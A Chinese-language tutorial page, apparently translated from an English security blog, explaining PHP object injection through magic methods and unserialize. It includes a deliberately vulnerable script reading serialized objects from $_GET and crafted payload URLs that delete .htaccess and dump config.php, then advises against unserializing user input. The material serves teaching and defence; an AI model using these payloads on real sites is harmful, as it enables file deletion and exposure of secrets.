文章詳情頁
詳析php對(duì)象注入漏洞
瀏覽:10日期:2022-09-13 10:45:13
0x00 背景
php對(duì)象注入是一個(gè)非常常見的漏洞,這個(gè)類型的漏洞雖然有些難以利用,但仍舊非常危險(xiǎn),為了理解這個(gè)漏洞,請(qǐng)讀者具備基礎(chǔ)的php知識(shí)。
0x01 漏洞案例
如果你覺得這是個(gè)渣渣洞,那么請(qǐng)看一眼這個(gè)列表,一些被挖到過該漏洞的系統(tǒng),你可以發(fā)現(xiàn)都是一些耳熟能詳?shù)耐嬉?就國外來說)
WordPress 3.6.1
Magento 1.9.0.1
Joomla 3.0.3
Ip board 3.3.5
除此之外等等一堆系統(tǒng),八成可能大概在這些還有其他的php程序中還有很多這種類型的漏洞,所以不妨考慮坐下喝杯咖啡并且試著去理解這篇文章。
0x01 PHP類和對(duì)象類和變量是非常容易理解的php概念,打個(gè)比方,下面的代碼在一個(gè)類中定義了一個(gè)變量和一個(gè)方法。<?php class TestClass { // 一個(gè)變量 public $variable = ’This is a string’; // 一個(gè)簡單的方法 public function PrintVariable() { echo $this->variable; } } // 創(chuàng)建一個(gè)對(duì)象 $object = new TestClass(); // 調(diào)用一個(gè)方法 $object->PrintVariable(); ?> 它創(chuàng)建了一個(gè)對(duì)象并且調(diào)用了 PrintVariable 函數(shù),該函數(shù)會(huì)輸出變量 variable。如果想了解更多關(guān)于php面向?qū)ο缶幊痰闹R(shí) 請(qǐng)點(diǎn): http://php.net/manual/zh/language.oop5.php0x02 php magic方法php類可能會(huì)包含一些特殊的函數(shù)叫magic函數(shù),magic函數(shù)命名是以符號(hào)“__”開頭的,比如 __construct, __destruct, __toString, __sleep, __wakeup 和其他的一些玩意。這些函數(shù)在某些情況下會(huì)自動(dòng)調(diào)用,比如:__construct 當(dāng)一個(gè)對(duì)象創(chuàng)建時(shí)調(diào)用 (constructor) __destruct 當(dāng)一個(gè)對(duì)象被銷毀時(shí)調(diào)用 (destructor) __ toString當(dāng)一個(gè)對(duì)象被當(dāng)作一個(gè)字符串使用為了更好的理解magic方法是如何工作的,讓我們添加一個(gè)magic方法在我們的類中。<?php class TestClass { // 一個(gè)變量 public $variable = ’This is a string’; // 一個(gè)簡單的方法 public function PrintVariable() { echo $this->variable . ’<br />’; } // Constructor public function __construct() { echo ’__construct <br />’; } // Destructor public function __destruct() { echo ’__destruct <br />’; } // Call public function __toString() { return ’__toString<br />’; } } // 創(chuàng)建一個(gè)對(duì)象 // __construct會(huì)被調(diào)用 $object = new TestClass(); // 創(chuàng)建一個(gè)方法 // ’This is a string’ 這玩意會(huì)被輸出 $object->PrintVariable(); // 對(duì)象被當(dāng)作一個(gè)字符串 // __toString 會(huì)被調(diào)用 echo $object; // End of PHP script // php腳本要結(jié)束了, __destruct會(huì)被調(diào)用 ?> 我們往里頭放了三個(gè) magic方法,__construct, __destruct和 __toString,你可以看出來,__construct在對(duì)象創(chuàng)建時(shí)調(diào)用, __destruct在php腳本結(jié)束時(shí)調(diào)用,__toString在對(duì)象被當(dāng)作一個(gè)字符串使用時(shí)調(diào)用。這個(gè)腳本會(huì)輸出這狗樣:__constructThis is a string__toString__destruct這只是一個(gè)簡單的例子,如果你想了解更多有關(guān)magic函數(shù)的例子,請(qǐng)點(diǎn)擊下面的鏈接:http://php.net/manual/zh/language.oop5.magic.php0x03 php對(duì)象序列化php允許保存一個(gè)對(duì)象方便以后重用,這個(gè)過程被稱為序列化,打個(gè)比方,你可以保存一個(gè)包含著用戶信息的對(duì)象方便等等重用。為了序列化一個(gè)對(duì)象,你需要調(diào)用 “serialize”函數(shù),函數(shù)會(huì)返回一個(gè)字符串,當(dāng)你需要用到這個(gè)對(duì)象的時(shí)候可以使用“unserialize”去重建對(duì)象。讓我們?cè)谛蛄谢瘉G進(jìn)那個(gè)例子,看看序列化長什么樣。<?php // 某類 class User { // 類數(shù)據(jù) public $age = 0; public $name = ’’; // 輸出數(shù)據(jù) public function PrintData() { echo ’User ’ . $this->name . ’ is ’ . $this->age . ’ years old. <br />’; } } // 創(chuàng)建一個(gè)對(duì)象 $usr = new User(); // 設(shè)置數(shù)據(jù) $usr->age = 20; $usr->name = ’John’; // 輸出數(shù)據(jù) $usr->PrintData(); // 輸出序列化之后的數(shù)據(jù) echo serialize($usr); ?> 它會(huì)輸出User John is 20 years old.O:4:'User':2:{s:3:'age';i:20;s:4:'name';s:4:'John”;}你可以看到序列化之后的數(shù)據(jù)中 有 20和John,其中沒有任何跟類有關(guān)的東西,只有其中的數(shù)據(jù)被數(shù)據(jù)化。為了使用這個(gè)對(duì)象,我們用unserialize重建對(duì)象。<?php // 某類 class User { // Class data public $age = 0; public $name = ’’; // Print data public function PrintData() { echo ’User ’ . $this->name . ’ is ’ . $this->age . ’ years old. <br />’; } } // 重建對(duì)象 $usr = unserialize(’O:4:'User':2:{s:3:'age';i:20;s:4:'name';s:4:'John';}’); // 調(diào)用PrintData 輸出數(shù)據(jù) $usr->PrintData(); ?> 這會(huì)輸出User John is 20 years old0x04 序列化magic函數(shù)magic函數(shù)constructor (__construct)和 destructor (__destruct) 是會(huì)在對(duì)象創(chuàng)建或者銷毀時(shí)自動(dòng)調(diào)用,其他的一些magic函數(shù)會(huì)在serialize 或者 unserialize的時(shí)候被調(diào)用。__sleep magic方法在一個(gè)對(duì)象被序列化的時(shí)候調(diào)用。 __wakeup magic方法在一個(gè)對(duì)象被反序列化的時(shí)候調(diào)用。注意 __sleep 必須返回一個(gè)數(shù)組與序列化的變量名。<?php class Test { public $variable = ’BUZZ’; public $variable2 = ’OTHER’; public function PrintVariable() { echo $this->variable . ’<br />’; } public function __construct() { echo ’__construct<br />’; } public function __destruct() { echo ’__destruct<br />’; } public function __wakeup() { echo ’__wakeup<br />’; } public function __sleep() { echo ’__sleep<br />’; return array(’variable’, ’variable2’); } } // 創(chuàng)建一個(gè)對(duì)象,會(huì)調(diào)用 __construct $obj = new Test(); // 序列化一個(gè)對(duì)象,會(huì)調(diào)用 __sleep $serialized = serialize($obj); //輸出序列化后的字符串 print ’Serialized: ’ . $serialized . <br />’; // 重建對(duì)象,會(huì)調(diào)用 __wakeup $obj2 = unserialize($serialized); //調(diào)用 PintVariable, 會(huì)輸出數(shù)據(jù) (BUZZ) $obj2->PrintVariable(); // php腳本結(jié)束,會(huì)調(diào)用 __destruct ?> 這玩意會(huì)輸出:__construct__sleepSerialized: O:4:'Test':2:{s:8:'variable';s:4:'BUZZ';s:9:'variable2';s:5:'OTHER';}__wakeupBUZZ__destruct__destruct你可以看到,我們創(chuàng)建了一個(gè)對(duì)象,序列化了它(然后__sleep被調(diào)用),之后用序列化對(duì)象重建后的對(duì)象創(chuàng)建了另一個(gè)對(duì)象,接著php腳本結(jié)束的時(shí)候兩個(gè)對(duì)象的__destruct都會(huì)被調(diào)用。更多相關(guān)的內(nèi)容http://php.net/manual/zh/language.oop5.serialization.php0x05 php對(duì)象注入現(xiàn)在我們理解了序列化是如何工作的,我們?cè)撊绾卫盟?事實(shí)上,利用這玩意的可能性有很多種,關(guān)鍵取決于應(yīng)用程序的流程與,可用的類,與magic函數(shù)。記住序列化對(duì)象的值是可控的。你可能會(huì)找到一套web程序的源代碼,其中某個(gè)類的__wakeup 或者 __destruct and其他亂七八糟的函數(shù)會(huì)影響到web程序。打個(gè)比方,我們可能會(huì)找到一個(gè)類用于臨時(shí)將日志儲(chǔ)存進(jìn)某個(gè)文件,當(dāng)__destruct被調(diào)用時(shí),日志文件會(huì)被刪除。<?php class LogFile { // log文件名 public $filename = ’error.log’; // 某代碼,儲(chǔ)存日志進(jìn)文件 public function LogData($text) { echo ’Log some data: ’ . $text . ’<br />’; file_put_contents($this->filename, $text, FILE_APPEND); } // Destructor 刪除日志文件 public function __destruct() { echo ’__destruct deletes '’ . $this->filename . ’' file. <br />’; unlink(dirname(__FILE__) . ’/’ . $this->filename); } } ?> 某例子關(guān)于如何使用這個(gè)類<?php include ’logfile.php’; // 創(chuàng)建一個(gè)對(duì)象 $obj = new LogFile(); // 設(shè)置文件名和要儲(chǔ)存的日志數(shù)據(jù) $obj->filename = ’somefile.log’; $obj->LogData(’Test’); // php腳本結(jié)束啦,__destruct被調(diào)用,somefile.log文件被刪除。 ?> 在其他的腳本,我們可能又恰好找到一個(gè)調(diào)用“unserialize”函數(shù)的,并且恰好變量是用戶可控的,又恰好是$_GET之類的。<?php include ’logfile.php’; // ... 一些狗日的代碼和 LogFile 類 ... // 簡單的類定義 class User { // 類數(shù)據(jù) public $age = 0; public $name = ’’; // 輸出數(shù)據(jù) public function PrintData() { echo ’User ’ . $this->name . ’ is ’ . $this->age . ’ years old. <br />’; } } // 重建 用戶輸入的 數(shù)據(jù) $usr = unserialize($_GET[’usr_serialized’]); ?> 你看,這個(gè)代碼調(diào)用了 “LogClass” 類,并且有一個(gè) “unserialize” 值是我們可以注入的。所以構(gòu)造類似這樣的東西:script.php?usr_serialized=O:4:'User':2:{s:3:'age';i:20;s:4:'name';s:4:'John”;}究竟發(fā)生了什么呢,因?yàn)檩斎胧强煽氐模晕覀兛梢詷?gòu)造任意的序列化對(duì)象,比如:<?php $obj = new LogFile(); $obj->filename = ’.htaccess’; echo serialize($obj) . ’<br />’; ?> 這個(gè)會(huì)輸出O:7:'LogFile':1:{s:8:'filename';s:9:'.htaccess';}__destruct deletes '.htaccess' file.現(xiàn)在我們將構(gòu)造過后的序列化對(duì)象發(fā)送給剛才的腳本:script.php?usr_serialized=O:7:'LogFile':1:{s:8:'filename';s:9:'.htaccess”;}這會(huì)輸出__destruct deletes '.htaccess' file.現(xiàn)在 .htaccess 已經(jīng)被干掉了,因?yàn)槟_本結(jié)束時(shí) __destruct會(huì)被調(diào)用。不過我們已經(jīng)可以控制“LogFile”類的變量啦。這就是漏洞名稱的由來:變量可控并且進(jìn)行了unserialize操作的地方注入序列化對(duì)象,實(shí)現(xiàn)代碼執(zhí)行或者其他坑爹的行為。雖然這不是一個(gè)很好的例子,不過我相信你可以理解這個(gè)概念,unserialize自動(dòng)調(diào)用 __wakeup 和 __destruct,接著攻擊者可以控制類變量,并且攻擊web程序。0x06 常見的注入點(diǎn)先不談 __wakeup 和 __destruct,還有一些很常見的注入點(diǎn)允許你利用這個(gè)類型的漏洞,一切都是取決于程序邏輯。打個(gè)比方,某用戶類定義了一個(gè)__toString為了讓應(yīng)用程序能夠?qū)㈩愖鳛橐粋€(gè)字符串輸出(echo $obj) ,而且其他類也可能定義了一個(gè)類允許__toString讀取某個(gè)文件。<?php // … 一些include ... class FileClass { // 文件名 public $filename = ’error.log’; //當(dāng)對(duì)象被作為一個(gè)字符串會(huì)讀取這個(gè)文件 public function __toString() { return file_get_contents($this->filename); } } // Main User class class User { // Class data public $age = 0; public $name = ’’; // 允許對(duì)象作為一個(gè)字符串輸出上面的data public function __toString() { return ’User ’ . $this->name . ’ is ’ . $this->age . ’ years old. <br />’; } } // 用戶可控 $obj = unserialize($_GET[’usr_serialized’]); // 輸出 __toString echo $obj; ?> so,我們構(gòu)造urlscript.php?usr_serialized=O:4:'User':2:{s:3:'age';i:20;s:4:'name';s:4:'John”;}再想想,如果我們用序列化調(diào)用 FileClass呢我們創(chuàng)建利用代碼<?php $fileobj = new FileClass(); $fileobj->filename = ’config.php’; echo serialize($fileobj); ?> 接著用生成的exp注入urlscript.php?usr_serialized=O:9:'FileClass':1:{s:8:'filename';s:10:'config.php”;}接著網(wǎng)頁會(huì)輸出 config.php的源代碼<?php $private_data = ’MAGIC’; ?> ps:我希望這讓你能夠理解。0x07 其他的利用方法可能其他的一些magic函數(shù)海存在利用點(diǎn):比如__call 會(huì)在對(duì)象調(diào)用不存在的函數(shù)時(shí)調(diào)用,__get 和 __set會(huì)在對(duì)象嘗試訪問一些不存在的類,變量等等時(shí)調(diào)用。不過需要注意的是,利用場景不限于magic函數(shù),也有一些方式可以在一半的函數(shù)中利用這個(gè)漏洞,打個(gè)比方,一個(gè)模塊可能定義了一個(gè)叫g(shù)et的函數(shù)進(jìn)行一些敏感的操作,比如訪問數(shù)據(jù)庫,這就可能造成sql注入,取決于函數(shù)本身的操作。唯一的一個(gè)技術(shù)難點(diǎn)在于,注入的類必須在注入點(diǎn)所在的地方,不過一些模塊或者腳本會(huì)使用“autoload”的功能,具體可以在這里了解http://php.net/manual/zh/language.oop5.autoload.php0x08 如何利用或者避免這個(gè)漏洞別在任何用戶可控的地方使用“unserialize”,可以考慮“json_decode“0x09 結(jié)論雖然很難找到而且很難利用,但是這真的真的很嚴(yán)重,可以導(dǎo)致各種各樣的漏洞。原文:http://securitycafe.ro/2015/01/05/understanding-php-object-injection/ 標(biāo)簽:
PHP
相關(guān)文章:
1. 爬取今日頭條Ajax請(qǐng)求2. ASP.NET Core按用戶等級(jí)授權(quán)的方法3. laravel ajax curd 搜索登錄判斷功能的實(shí)現(xiàn)4. HTML <!DOCTYPE> 標(biāo)簽5. 詳解JSP 內(nèi)置對(duì)象request常見用法6. JavaScrip簡單數(shù)據(jù)類型隱式轉(zhuǎn)換的實(shí)現(xiàn)7. HTML DOM setInterval和clearInterval方法案例詳解8. ASP動(dòng)態(tài)網(wǎng)頁制作技術(shù)經(jīng)驗(yàn)分享9. webpack高級(jí)配置與優(yōu)化詳解10. JS中map和parseInt的用法詳解
排行榜
網(wǎng)公網(wǎng)安備